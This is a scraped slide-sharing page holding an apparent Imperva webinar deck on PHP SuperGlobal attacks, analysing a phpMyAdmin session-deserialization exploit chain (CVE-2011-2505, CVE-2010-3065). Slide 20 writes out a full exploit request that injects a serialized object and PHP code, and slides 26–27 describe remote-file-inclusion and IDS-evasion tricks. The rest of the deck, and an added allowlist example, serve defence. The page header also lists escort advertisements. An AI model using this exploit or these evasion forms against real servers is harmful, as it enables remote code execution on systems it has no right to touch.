Driving Behavioral Change for Information Management through Data-Driven Gree...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 

PHP SuperGlobals: Supersized Trouble

  • 1. © 2013 Imperva, Inc. All rights reserved. PHP SuperGlobals: Supersized Trouble Confidential1 Tal Be’ery, Web Security Research Team Leader
  • 2. © 2013 Imperva, Inc. All rights reserved. Agenda Confidential2 §  Introduction •  Relevant PHP background §  An anatomy of a modern web exploit •  Abusing SuperGlobals §  Additional PHP SuperGlobal attacks •  In the wild §  Summary & conclusions §  Q&A
  • 3. © 2013 Imperva, Inc. All rights reserved. HII Reports Confidential3 §  Hacker Intelligence Initiative is focused at understanding how attackers are operating in practice •  A different approach from vulnerability research §  Data set composition •  ~60 real world applications •  Anonymous Proxies §  More than 24 months of data §  Powerful analysis system •  Combines analytic tools with drill down capabilities
  • 4. © 2013 Imperva, Inc. All rights reserved. Tal Be’ery,Web Research Team Leader Confidential4 §  Web Security Research Team Leader at Imperva §  Holds MSc & BSc degree in CS/EE from TAU §  10+ years of experience in IS domain §  Facebook “white hat” §  Speaker at RSA, BlackHat, AusCERT §  Columnist for securityweek.com §  CISSP
  • 5. © 2013 Imperva, Inc. All rights reserved. Introduction Confidential5 Relevant PHP Background
  • 6. © 2013 Imperva, Inc. All rights reserved. §  The most popular server-side programming language in the world: §  And goes from strength to strength Breadth and Depth of PHP - I Confidential6
  • 7. © 2013 Imperva, Inc. All rights reserved. §  The most popular web applications are powered by PHP Breadth and Depth of PHP – II http://www.alexa.com/topsites Confidential7
  • 8. © 2013 Imperva, Inc. All rights reserved. PHP SuperGlobals Confidential8 §  Most programing languages support different scopes for variables, primarily the “local” and the “global” scope. §  Global variables •  Provide a simple channel for cross-function communication •  More risky, as *ANY* function may change them §  PHP has several predefined variables that are called SuperGlobals. §  SuperGlobals provide access to the server’s core functionality – cookies, sessions, environment, etc. §  SuperGlobals variables are available to the PHP script in all scopes, with no need for explicit declaration.
  • 9. © 2013 Imperva, Inc. All rights reserved. PHP SuperGlobal List Confidential9   Variable   Definition   1   GLOBALS   References all variables available in global scope   2   _SERVER   Server and execution environment information   3   _GET   HTTP GET variables   4   _POST   HTTP POST variables   5   _FILES   HTTP File upload variables   6   _COOKIE   HTTP Cookies   7   _SESSION   Session variables   8   _REQUEST   HTTP Request variables   9   _ENV   Environment variables  
  • 10. © 2013 Imperva, Inc. All rights reserved. External Variable Modification: A PHP Specific Weakness Confidential10 §  MITRE had assigned a specific CWE (Common Weakness Enumeration) code for the External Variable Modification weakness: CWE-473 §  “A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies”. §  SuperGlobals are a natural target: •  Exist in every PHP application •  Provide access to the server’s core functionality
• 11. Anatomy of a Modern Web Exploit: Exploiting SuperGlobals
• 12. PHPMyAdmin (PMA)
§  The most popular MySQL administration tool for PHP
§  Often bundled by default in LAMP (Linux, Apache, MySQL, PHP) installations
• 13. CVE-2011-2505: PhpMyAdmin Vulnerability
§  PhpMyAdmin’s unset session functionality
§  parse_str(): parses the given query string and stores the variables in the current scope. As a result, *ALL* request variables are imported into the function’s local scope.
§  session_write_close(): makes session data persistent throughout the user’s entire session. Session data is implicitly written to a local file on the server.
• 14. CVE-2011-2505: Exploit
§  An attacker can now
  •  Craft a malicious query string with the _SESSION SuperGlobal
  •  Injected _SESSION value overrides the session’s original values
  •  New values are saved to local file
• 15. Serialization Explained
§  The process of saving data stored in memory to file is called “serialization”
§  The process of loading data stored in file to memory is called “deserialization”
Source: http://www.studytonight.com/java/images/Serialization-deserialization.JPG
• 16. CVE-2010-3065 PHP Vulnerability & Exploit
§  Discovered by Stefan Esser - Late 2010
§  Attacker can write data to the session in *ANY* format, if the session variable name starts with ‘!’
• 17. PMA Session Deserialization: Vulnerability
§  On session deserialization, the load() function is called
§  Eval is evil!
  •  Can be used to execute unexpected code
§  But in order to exploit, attackers need to first specify a valid source (= session filename)
• 18. Guessing Session Filename: Theory
§  Luckily for the attacker, the location of the session file is predictable
§  Session file name consists of
  •  The “sess_” prefix
  •  The session identifier – known to the user/attacker
§  File’s path is predictable
  •  Default values
• 19. Guessing Session Filename: In the Wild
§  Multiple guesses for the path of the same session file (“sess_19qq…”)
• 20. The Final Exploit
§  Now the attackers can, *FINALLY*, get their code evaluated
§  /phpMyAdmin/index.php?session_to_unset=123&token=86498ff0a666f808df76ffaabee9b7a3&_SESSION[!bla]=|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:59:"/var/lib/php5/sess_6a3e0376fbfe9797081a3ee202ef1ca85c451a62";}}&_SESSION[payload]=<?php phpinfo(); ?>
• 21. Exploit Result
§  Arbitrary PHP code is executed
• 22. PMA SuperGlobal Attacks In the Wild
§  Attack source is a hacked server
§  Attacks (at least) two other servers
§  Attacks persist over half a year
• 23. A Modern Exploit Summary: Research
§  Sophisticated research
§  Combines multiple vulnerabilities and issues in multiple domains
  •  PHPMyAdmin (PMA)
  •  PHP internals
• 24. A Modern Exploit Summary: Development
§  Exploit packed in a single, “click once” PHP script
§  Automates the different attack stages
§  Can be launched from infected servers to infect others
• 25. Additional PHP SuperGlobal Attacks: In the Wild
• 26. SuperGlobal Attack Targets – I
§  Specific vulnerability exploits – such as the previously discussed PMA attack
§  RFI (Remote File Inclusion): trying to overwrite “Server[document_root]” to point to an external resource
• 27. SuperGlobal Attack Targets – II
§  Part of general scanning against the site – Nikto, Acunetix, Nessus
§  IDS filter evasion: SuperGlobals provide an alternative way to represent HTTP query parameters
  •  The “_REQUEST[Itemid]=1” request parameter is equivalent to “Itemid=1” in every way
  •  However, it evades a naïve IDS signature that blacklists “Itemid=1”
  •  We have seen this evasion technique applied on several CVEs
• 28. SuperGlobals In the Wild
§  During May 2013:
  •  3.5K requests that manipulated PHP SuperGlobal variables
  •  27 different attack sources
  •  24 web applications as targets
• 29. Targeted SuperGlobal
§  Some SuperGlobals are more targeted than others
§  The more targeted SuperGlobals provide access to more sensitive resources
Chart data: GLOBALS 55%, ENV 14%, SERVER 14%, SESSION 13%, REQUEST 4%
• 30. Summary & Conclusions
• 31. The Importance of a Positive Security Model
§  The essence of the external variable manipulation weakness: the attacker has the ability to send external parameters with the same names as internal variables, and thus override the value of the latter.
§  External parameters are not part of the standard interface of the targeted application
§  Blocking all of the internal variables’ names might be difficult with a negative security approach
§  But trivial with a positive security mechanism that specifies the allowed parameter names for each resource
• 32. Layered Application Layer Mechanisms
§  Bad news: attackers can create a complex exploit by combining several vulnerabilities together
§  Good news: it’s enough to break one of the links in the kill chain to break the chain altogether.
§  An application layer solution that combines multiple detection mechanisms is crucial for effective mitigation of such complex attacks:
  •  Positive security model
  •  Negative security model for generic issues (generic directory traversal protection for this case)
  •  Specific CVE detection
• 33. Third-Party Code Perils
§  Attackers target popular applications such as the PhpMyAdmin (PMA) utility installation.
§  PMA is often bundled with other applications.
§  Having this vulnerable utility present on the server, even if it is not being used, exposes the server to code execution attacks.
§  Since administrators are not necessarily aware of all the bundled software, an “opt out” security model is needed.
§  A way to achieve such an “opt out” security model is by deploying a Web Application Firewall (WAF) with constant updates of security content.
• 34. SuperGlobal Parameters In Requests Should Be Blocked
§  There is no reason for these parameters to be present in valid requests; they should be banned.
§  Imperva’s WAF customers received a content update to their Web Application Firewall on January 15th 2013.
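As an added example (not phpMyAdmin's or Imperva's code), the PHP gate below applies the positive security model of slides 31 and 34 to the parse_str() pattern behind CVE-2011-2505 (slide 13) and to the _REQUEST[Itemid] evasion form of slide 27: the query string is parsed into a local array, and every top-level parameter name is checked against the resource's allowlist and against the nine SuperGlobal names. The function names, the TOKEN placeholder and the sample query strings are assumptions.

```php
<?php
// Added example (not phpMyAdmin's or Imperva's code): a positive-security
// gate for request parameters. The query string is parsed into a local
// array, never into the current scope as single-argument parse_str() did
// before PHP 8, and any parameter that names a SuperGlobal or is not on
// the resource's allowlist is reported. All names here are hypothetical.

// The nine SuperGlobals from the slide 9 table. Comparison drops the
// leading underscore and ignores case, so both "_SERVER[...]" and the
// "Server[document_root]" variant from slide 26 are caught.
const SUPERGLOBAL_NAMES = ['GLOBALS', 'SERVER', 'GET', 'POST', 'FILES',
                           'COOKIE', 'SESSION', 'REQUEST', 'ENV'];

function isSuperGlobalName(string $name): bool
{
    return in_array(strtoupper(ltrim($name, '_')), SUPERGLOBAL_NAMES, true);
}

// Returns the top-level parameter names that must be rejected for this
// resource; an empty array means the request passes the gate.
function rejectedParams(string $queryString, array $allowed): array
{
    parse_str($queryString, $params);   // "_SESSION[!bla]=x" -> $params['_SESSION']['!bla']
    $rejected = [];
    foreach (array_keys($params) as $name) {
        $name = (string) $name;
        if (isSuperGlobalName($name) || !in_array($name, $allowed, true)) {
            $rejected[] = $name;
        }
    }
    return $rejected;
}

// Constructed inputs modelled on the requests quoted in these slides;
// TOKEN stands in for a real phpMyAdmin token.
$samples = [
    ['session_to_unset=123&token=TOKEN', ['session_to_unset', 'token']],
    ['session_to_unset=123&token=TOKEN&_SESSION[!bla]=x&_SESSION[payload]=y',
     ['session_to_unset', 'token']],
    ['Itemid=1', ['Itemid']],                    // plain form, allowed
    ['_REQUEST[Itemid]=1', ['Itemid']],          // evasion form from slide 27
    ['Server[document_root]=http://example.invalid/', ['Itemid']],  // RFI attempt from slide 26
    ['GLOBALS[cfg]=1', ['Itemid']],
];
foreach ($samples as [$qs, $allowed]) {
    $bad = rejectedParams($qs, $allowed);
    printf("%-70s -> %s\n", $qs, $bad ? 'reject (' . implode(', ', $bad) . ')' : 'allow');
}
```

Only the first and third samples pass; the others are rejected on the SuperGlobal name alone, before any signature on the parameter value is consulted.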
• 35. Summing Up
§  Establish a positive security model
§  Use layered application layer security mechanisms
§  Beware of third-party code perils
§  Block SuperGlobal parameters in requests
• 36. Webinar Materials
§  Post-Webinar Discussions
§  Answers to Attendee Questions
§  Webinar Recording Link
§  Join Group: Join the Imperva LinkedIn Group, Imperva Data Security Direct, for…
• 37. www.imperva.com